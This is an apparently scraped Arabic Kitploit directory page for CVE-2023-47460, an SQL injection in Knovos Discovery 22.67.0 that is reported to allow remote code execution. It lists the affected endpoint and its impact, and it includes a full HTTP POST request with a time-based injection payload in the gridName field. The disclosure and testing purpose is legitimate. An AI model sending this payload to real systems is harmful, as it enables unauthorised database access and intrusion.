Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-47460 — استغلال إثبات المفهوم لحقن SQL في Knovos Discovery v22.67.0، يوضح تنفيذ التعليمات البرمجية عن بُعد عبر نقطة نهاية getGridColumnStructure. | Kitploit
أدوات/GitHubGitHub/aleksey-vi/cve-2023-47460
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubaleksey-vi/cve-2023-47460

CVE-2023-47460

استغلال إثبات المفهوم لحقن SQL في Knovos Discovery v22.67.0، يوضح تنفيذ التعليمات البرمجية عن بُعد عبر نقطة نهاية getGridColumnStructure.

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-47460

الوصف

ثغرة حقن SQL في Knovos Discovery الإصدار 22.67.0 تسمح لمهاجم عن بعد بتنفيذ كود عشوائي عبر المكون /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure

نوع الثغرة

حقن SQL

الشركة المصنعة

Knovos Discovery

قاعدة كود المنتج المتأثر

الإصدار 22.67.0 - الإصدار 22.67.0

المكون المتأثر

/DiscoveryProcess/Service/Admin.svc/getGridColumnStructure

نوع الهجوم

عن بعد

تأثير تنفيذ الكود

صحيح

تأثير كشف المعلومات

صحيح

المكتشف

  • Aleksey Vistorobskiy

متجهات الهجوم

مستخدم مصرح به

الطلب:

root@kitploit:~
POST /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure?caseMappingId=*** HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close

{
  "gridName":"Inventory-grid' waitfor delay'0:0:50'--",
  "uID":"10"
}

الاستجابة:

المراجع

  • https://www.knovos.com/
  • https://github.com/aleksey-vi/CVE-2023-47460
تنزيل الأداة